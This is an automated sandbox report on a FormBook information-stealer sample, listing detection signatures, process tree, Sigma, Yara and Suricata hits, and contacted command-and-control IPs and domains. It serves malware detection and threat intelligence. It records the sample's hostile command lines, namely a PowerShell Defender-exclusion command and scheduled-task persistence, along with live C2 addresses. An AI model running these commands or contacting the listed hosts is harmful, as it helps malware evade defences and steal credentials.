Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MN1qo2qaJmEvXDP.exe

Overview

General Information

Sample name:MN1qo2qaJmEvXDP.exe
Analysis ID:1571280
MD5:b5554d36a6fca18d2bba3d41d4070539
SHA1:9ca275cf18f4796b97748ddb7e1525b997206293
SHA256:2a9f7757a2446c5dcae00827c59c685ae20f44f182a169e9c74304b04aed9d60
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • MN1qo2qaJmEvXDP.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" MD5: B5554D36A6FCA18D2BBA3D41D4070539)
    • powershell.exe (PID: 1232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7204 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 5616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5640 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 1700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • aDvThgRLSEMTIq.exe (PID: 388 cmdline: "C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systray.exe (PID: 7648 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • aDvThgRLSEMTIq.exe (PID: 1344 cmdline: "C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7860 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • rlJvZXSinaRi.exe (PID: 7184 cmdline: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe MD5: B5554D36A6FCA18D2BBA3D41D4070539)
    • schtasks.exe (PID: 7548 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ParentImage: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe, ParentProcessId: 6340, ParentProcessName: MN1qo2qaJmEvXDP.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ProcessId: 1232, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ParentImage: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe, ParentProcessId: 6340, ParentProcessName: MN1qo2qaJmEvXDP.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ProcessId: 1232, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe, ParentImage: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe, ParentProcessId: 7184, ParentProcessName: rlJvZXSinaRi.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", ProcessId: 7548, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ParentImage: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe, ParentProcessId: 6340, ParentProcessName: MN1qo2qaJmEvXDP.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp", ProcessId: 5640, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ParentImage: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe, ParentProcessId: 6340, ParentProcessName: MN1qo2qaJmEvXDP.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ProcessId: 1232, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe", ParentImage: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe, ParentProcessId: 6340, ParentProcessName: MN1qo2qaJmEvXDP.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp", ProcessId: 5640, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T08:43:36.387491+010028554641A Network Trojan was detected192.168.2.1249729162.0.215.3380TCP
                2024-12-09T08:43:39.011783+010028554641A Network Trojan was detected192.168.2.1249730162.0.215.3380TCP
                2024-12-09T08:43:41.623741+010028554641A Network Trojan was detected192.168.2.1249731162.0.215.3380TCP
                2024-12-09T08:43:51.260792+010028554641A Network Trojan was detected192.168.2.1249733104.18.73.11680TCP
                2024-12-09T08:43:53.845627+010028554641A Network Trojan was detected192.168.2.1249734104.18.73.11680TCP
                2024-12-09T08:43:56.559978+010028554641A Network Trojan was detected192.168.2.1249735104.18.73.11680TCP
                2024-12-09T08:44:06.861014+010028554641A Network Trojan was detected192.168.2.1249738192.185.147.10080TCP
                2024-12-09T08:44:09.488062+010028554641A Network Trojan was detected192.168.2.1249739192.185.147.10080TCP
                2024-12-09T08:44:12.232412+010028554641A Network Trojan was detected192.168.2.1249740192.185.147.10080TCP
                2024-12-09T08:44:21.321792+010028554641A Network Trojan was detected192.168.2.124974213.248.169.4880TCP
                2024-12-09T08:44:23.989425+010028554641A Network Trojan was detected192.168.2.124974313.248.169.4880TCP
                2024-12-09T08:44:26.663334+010028554641A Network Trojan was detected192.168.2.124974413.248.169.4880TCP
                2024-12-09T08:44:37.080387+010028554641A Network Trojan was detected192.168.2.12497473.33.130.19080TCP
                2024-12-09T08:44:39.683703+010028554641A Network Trojan was detected192.168.2.12497483.33.130.19080TCP
                2024-12-09T08:44:42.368068+010028554641A Network Trojan was detected192.168.2.12497493.33.130.19080TCP
                2024-12-09T08:44:52.069945+010028554641A Network Trojan was detected192.168.2.1249751104.21.38.11380TCP
                2024-12-09T08:44:54.742227+010028554641A Network Trojan was detected192.168.2.1249752104.21.38.11380TCP
                2024-12-09T08:44:57.415681+010028554641A Network Trojan was detected192.168.2.1249753104.21.38.11380TCP
                2024-12-09T08:45:45.976450+010028554641A Network Trojan was detected192.168.2.1249755103.249.106.9180TCP
                2024-12-09T08:45:48.712723+010028554641A Network Trojan was detected192.168.2.1249756103.249.106.9180TCP
                2024-12-09T08:45:51.466321+010028554641A Network Trojan was detected192.168.2.1249757103.249.106.9180TCP
                2024-12-09T08:46:01.778823+010028554641A Network Trojan was detected192.168.2.1249760121.43.155.3580TCP
                2024-12-09T08:46:04.485609+010028554641A Network Trojan was detected192.168.2.1249761121.43.155.3580TCP
                2024-12-09T08:46:07.139061+010028554641A Network Trojan was detected192.168.2.1249762121.43.155.3580TCP
                2024-12-09T08:46:26.853604+010028554641A Network Trojan was detected192.168.2.1249764199.192.23.12380TCP
                2024-12-09T08:46:29.526825+010028554641A Network Trojan was detected192.168.2.1249765199.192.23.12380TCP
                2024-12-09T08:46:32.175938+010028554641A Network Trojan was detected192.168.2.1249766199.192.23.12380TCP
                2024-12-09T08:46:42.249558+010028554641A Network Trojan was detected192.168.2.124976852.60.87.16380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeReversingLabs: Detection: 63%
                Multi AV Scanner detection for submitted file
                Source: MN1qo2qaJmEvXDP.exeReversingLabs: Detection: 63%
                Source: MN1qo2qaJmEvXDP.exeVirustotal: Detection: 47%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: MN1qo2qaJmEvXDP.exeJoe Sandbox ML: detected
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: systray.pdb source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780554280.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4781364571.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00ACC730 FindFirstFileW,FindNextFileW,FindClose,19_2_00ACC730
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 4x nop then jmp 09440109h0_2_09440438
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 4x nop then jmp 09440109h0_2_094404A6
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 4x nop then jmp 057B0109h11_2_057B04A6
                Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then xor eax, eax19_2_00AB9F20
                Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi19_2_00ABE2E8
                Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then mov ebx, 00000004h19_2_048E04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49743 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49730 -> 162.0.215.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49731 -> 162.0.215.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49734 -> 104.18.73.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49735 -> 104.18.73.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49742 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49752 -> 104.21.38.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49757 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49749 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49751 -> 104.21.38.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49738 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49747 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49762 -> 121.43.155.35:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49729 -> 162.0.215.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49733 -> 104.18.73.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49739 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49740 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49764 -> 199.192.23.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49755 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49766 -> 199.192.23.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49761 -> 121.43.155.35:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49753 -> 104.21.38.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49765 -> 199.192.23.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49768 -> 52.60.87.163:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49748 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49744 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49756 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49760 -> 121.43.155.35:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.6822662.xyz
                Source: DNS query: www.lingdianyun29.xyz
                Source: Joe Sandbox ViewIP Address: 162.0.215.33 162.0.215.33
                Source: Joe Sandbox ViewIP Address: 104.18.73.116 104.18.73.116
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
